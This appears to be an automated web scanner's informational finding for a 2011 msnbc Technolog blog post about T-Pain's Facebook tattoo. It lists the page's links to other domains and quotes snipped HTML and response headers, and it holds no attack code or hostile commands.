<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.343. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://aquatone.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://biggie2221635.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://john875667.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://ljrhodes.newsvine.com/
http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1043008822&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://minotown.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/helenaspopkin
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://tyler.newsvine.com/
http://waynej.newsvine.com/
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
http://zugg2.newsvine.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:11:05 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1043008822&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://aquatone.newsvine.com/">aquatone</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://zugg2.newsvine.com/">zugg</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
